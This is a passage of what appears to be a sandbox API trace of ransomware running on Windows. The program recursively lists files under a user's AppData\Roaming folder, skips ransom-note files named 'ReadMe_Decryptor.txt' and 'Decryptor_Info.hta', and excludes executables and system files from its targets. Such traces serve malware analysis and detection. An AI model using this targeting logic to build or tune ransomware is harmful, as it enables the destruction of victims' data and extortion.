HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0080.034] PathAddBackslashW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="" [0080.034] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0080.034] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x709a08 [0080.034] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.034] FindNextFileW (in: hFindFile=0x709a08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1b135100, ftLastAccessTime.dwHighDateTime=0x1d62227, ftLastWriteTime.dwLowDateTime=0x1b135100, ftLastWriteTime.dwHighDateTime=0x1d62227, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.034] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.035] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.035] FindNextFileW (in: hFindFile=0x709a08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x632e5090, ftCreationTime.dwHighDateTime=0x1d5e666, ftLastAccessTime.dwLowDateTime=0x1b058250, ftLastAccessTime.dwHighDateTime=0x1d5e24e, ftLastWriteTime.dwLowDateTime=0x1b058250, ftLastWriteTime.dwHighDateTime=0x1d5e24e, nFileSizeHigh=0x0, nFileSizeLow=0xf637, dwReserved0=0x0, dwReserved1=0x0, cFileName="1fGwisp8jCt.png", cAlternateFileName="1FGWIS~1.PNG")) returned 1 [0080.035] lstrcmpW (lpString1="1fGwisp8jCt.png", lpString2=".") returned 1 [0080.035] lstrcmpW (lpString1="1fGwisp8jCt.png", lpString2="..") returned 1 [0080.035] lstrcmpiW (lpString1="1fGwisp8jCt.png", lpString2="ReadMe_Decryptor.txt") returned -1 [0080.035] lstrcmpiW (lpString1="1fGwisp8jCt.png", lpString2="Decryptor_Info.hta") returned -1 [0080.035] PathFindExtensionW (pszPath="1fGwisp8jCt.png") returned=".png" [0080.035] lstrcmpiW (lpString1=".png", lpString2=".exe") returned 1 [0080.035] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0080.035] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0080.035] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0080.035] lstrcmpiW (lpString1=".png", lpString2=".msi") returned 1 [0080.035] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0080.035] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x72a920 [0080.035] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0080.035] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x72a9b8 [0080.035] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0080.035] FindNextFileW (in: hFindFile=0x709a08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x376c19c0, ftCreationTime.dwHighDateTime=0x1d5d99a, ftLastAccessTime.dwLowDateTime=0xb623f4e0, ftLastAccessTime.dwHighDateTime=0x1d5e6b0, ftLastWriteTime.dwLowDateTime=0xb623f4e0, ftLastWriteTime.dwHighDateTime=0x1d5e6b0, nFileSizeHigh=0x0, nFileSizeLow=0xe3cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="5hhJT-UBVp.avi", cAlternateFileName="5HHJT-~1.AVI")) returned 1 [0080.035] lstrcmpW (lpString1="5hhJT-UBVp.avi", lpString2=".") returned 1 [0080.035] lstrcmpW (lpString1="5hhJT-UBVp.avi", lpString2="..") returned 1 [0080.035] lstrcmpiW (lpString1="5hhJT-UBVp.avi", lpString2="ReadMe_Decryptor.txt") returned -1 [0080.035] lstrcmpiW (lpString1="5hhJT-UBVp.avi", lpString2="Decryptor_Info.hta") returned -1 [0080.035] PathFindExtensionW (pszPath="5hhJT-UBVp.avi") returned=".avi" [0080.035] lstrcmpiW (lpString1=".avi", lpString2=".exe") returned -1 [0080.035] lstrcmpiW (lpString1=".avi", lpString2=".sys") returned -1 [0080.036] lstrcmpiW (lpString1=".avi", lpString2=".lnk") returned -1 [0080.036] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0080.036] lstrcmpiW (lpString1=".avi", lpString2=".msi") returned -1 [0080.036] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0080.036] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x72a920 [0080.036] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0080.036] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x709470 [0080.036] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0080.036] FindNextFileW (in: hFindFile=0x709a08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x97f88d50, ftCreationTime.dwHighDateTime=0x1d5e52f, ftLastAccessTime.dwLowDateTime=0x4fd9a8c0, ftLastAccessTime.dwHighDateTime=0x1d5e0d8, ftLastWriteTime.dwLowDateTime=0x4fd9a8c0, ftLastWriteTime.dwHighDateTime=0x1d5e0d8, nFileSizeHigh=0x0, nFileSizeLow=0x11c6d, dwReserved0=0x0, dwReserved1=0x0, cFileName="6V7X.flv", cAlternateFileName="")) returned 1 [0080.036] lstrcmpW (lpString1="6V7X.flv", lpString2=".") returned 1 [0080.036] lstrcmpW (lpString1="6V7X.flv", lpString2="..") returned 1 [0080.036] lstrcmpiW (lpString1="6V7X.flv", lpString2="ReadMe_Decryptor.txt") returned -1 [0080.036] lstrcmpiW (lpString1="6V7X.flv", lpString2="Decryptor_Info.hta") returned -1 [0080.036] PathFindExtensionW (pszPath="6V7X.flv") returned=".flv" [0080.036] lstrcmpiW (lpString1=".flv", lpString2=".exe") returned 1 [0080.036] lstrcmpiW (lpString1=".flv", lpString2=".sys") returned -1 [0080.036] lstrcmpiW (lpString1=".flv", lpString2=".lnk") returned -1 [0080.036] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0080.036] lstrcmpiW (lpString1=".flv", lpString2=".msi") returned -1 [0080.036] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0080.036] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x72a920 [0080.036] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0080.036] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x7094f8 [0080.036] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0080.036] FindNextFileW (in: hFindFile=0x709a08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8a6a0e90, ftCreationTime.dwHighDateTime=0x1d5dc6d, ftLastAccessTime.dwLowDateTime=0x919ca820, ftLastAccessTime.dwHighDateTime=0x1d5da66, ftLastWriteTime.dwLowDateTime=0x919ca820, ftLastWriteTime.dwHighDateTime=0x1d5da66, nFileSizeHigh=0x0, nFileSizeLow=0x5b10, dwReserved0=0x0, dwReserved1=0x0, cFileName="9iCmi1wS.m4a", cAlternateFileName="")) returned 1 [0080.036] lstrcmpW (lpString1="9iCmi1wS.m4a", lpString2=".") returned 1 [0080.036] lstrcmpW (lpString1="9iCmi1wS.m4a", lpString2="..") returned 1 [0080.036] lstrcmpiW (lpString1="9iCmi1wS.m4a", lpString2="ReadMe_Decryptor.txt") returned -1 [0080.036] lstrcmpiW (lpString1="9iCmi1wS.m4a", lpString2="Decryptor_Info.hta") returned -1 [0080.037] PathFindExtensionW (pszPath="9iCmi1wS.m4a") returned=".m4a" [0080.037] lstrcmpiW (lpString1=".m4a", lpString2=".exe") returned 1 [0080.037] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0080.037] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0080.037] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0080.037] lstrcmpiW (lpString1=".m4a", lpString2=".msi") returned -1 [0080.037] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0080.037] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x72a920 [0080.037] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0080.037] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x709570 [0080.037] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0080.037] FindNextFileW (in: hFindFile=0x709a08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbba839d0, ftCreationTime.dwHighDateTime=0x1d5e246, ftLastAccessTime.dwLowDateTime=0xede590f0, ftLastAccessTime.dwHighDateTime=0x1d5e57f, ftLastWriteTime.dwLowDateTime=0xede590f0, ftLastWriteTime.dwHighDateTime=0x1d5e57f, nFileSizeHigh=0x0, nFileSizeLow=0xf0e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="9kbs2_w18IOb i9.pps", cAlternateFileName="9KBS2_~1.PPS")) returned 1 [0080.037] lstrcmpW (lpString1="9kbs2_w18IOb i9.pps", lpString2=".") returned 1 [0080.037] lstrcmpW (lpString1="9kbs2_w18IOb i9.pps", lpString2="..") returned 1 [0080.037] lstrcmpiW (lpString1="9kbs2_w18IOb i9.pps", lpString2="ReadMe_Decryptor.txt") returned -1 [0080.037] lstrcmpiW (lpString1="9kbs2_w18IOb i9.pps", lpString2="Decryptor_Info.hta") returned -1 [0080.037] PathFindExtensionW (pszPath="9kbs2_w18IOb i9.pps") returned=".pps" [0080.037] lstrcmpiW (lpString1=".pps", lpString2=".exe") returned 1 [0080.037] lstrcmpiW (lpString1=".pps", lpString2=".sys") returned -1 [0080.037] lstrcmpiW (lpString1=".pps", lpString2=".lnk") returned 1 [0080.037] lstrcmpiW (lpString1=".pps", lpString2=".dll") returned 1 [0080.037] lstrcmpiW (lpString1=".pps", lpString2=".msi") returned 1 [0080.037] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0080.037] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0080.037] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0080.037] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x709be8 [0080.037] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0080.037] FindNextFileW (in: hFindFile=0x709a08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0080.038] lstrcmpW (lpString1="Adobe", lpString2=".") returned 1 [0080.038] lstrcmpW (lpString1="Adobe", lpString2="..") returned 1 [0080.038] lstrlenW (lpString="Adobe") returned 5 [0080.038] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="Adobe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe" [0080.038] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\" [0080.038] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\") returned 52 [0080.038] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x708d18 [0080.303] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.303] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.303] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.303] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.303] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0080.303] lstrcmpW (lpString1="Acrobat", lpString2=".") returned 1 [0080.303] lstrcmpW (lpString1="Acrobat", lpString2="..") returned 1 [0080.303] lstrlenW (lpString="Acrobat") returned 7 [0080.303] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpString2="Acrobat" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat" [0080.303] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\" [0080.303] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\") returned 60 [0080.303] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a920 [0080.304] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.304] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.306] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.306] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.306] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xec7c9cd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec7c9cd0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0080.306] lstrcmpW (lpString1="10.0", lpString2=".") returned 1 [0080.306] lstrcmpW (lpString1="10.0", lpString2="..") returned 1 [0080.306] lstrlenW (lpString="10.0") returned 4 [0080.306] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpString2="10.0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0" [0080.306] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\" [0080.307] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\") returned 65 [0080.307] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a960 [0080.307] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.307] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xec7c9cd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec7c9cd0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.309] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.309] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.309] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd9f48400, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd9f48400, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd9f48400, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Collab", cAlternateFileName="")) returned 1 [0080.309] lstrcmpW (lpString1="Collab", lpString2=".") returned 1 [0080.309] lstrcmpW (lpString1="Collab", lpString2="..") returned 1 [0080.309] lstrlenW (lpString="Collab") returned 6 [0080.309] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpString2="Collab" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab" [0080.309] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\" [0080.309] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\") returned 72 [0080.309] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x709c80 [0080.539] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.539] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd9f48400, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd9f48400, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd9f48400, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.554] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.554] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.554] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd9f48400, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd9f48400, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd9f48400, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0080.554] FindClose (in: hFindFile=0x709c80 | out: hFindFile=0x709c80) returned 1 [0080.554] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd9df17a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd9df17a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd9df17a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Forms", cAlternateFileName="")) returned 1 [0080.554] lstrcmpW (lpString1="Forms", lpString2=".") returned 1 [0080.555] lstrcmpW (lpString1="Forms", lpString2="..") returned 1 [0080.555] lstrlenW (lpString="Forms") returned 5 [0080.555] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpString2="Forms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms" [0080.555] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\" [0080.555] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\") returned 71 [0080.555] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x709c80 [0080.555] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.555] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd9df17a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd9df17a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd9df17a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.555] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.555] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.556] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd9df17a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd9df17a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd9df17a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0080.556] FindClose (in: hFindFile=0x709c80 | out: hFindFile=0x709c80) returned 1 [0080.556] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec7c9cd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec7c9cd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec7c9cd0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="JavaScripts", cAlternateFileName="JAVASC~1")) returned 1 [0080.556] lstrcmpW (lpString1="JavaScripts", lpString2=".") returned 1 [0080.556] lstrcmpW (lpString1="JavaScripts", lpString2="..") returned 1 [0080.556] lstrlenW (lpString="JavaScripts") returned 11 [0080.556] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpString2="JavaScripts" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts" [0080.556] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS 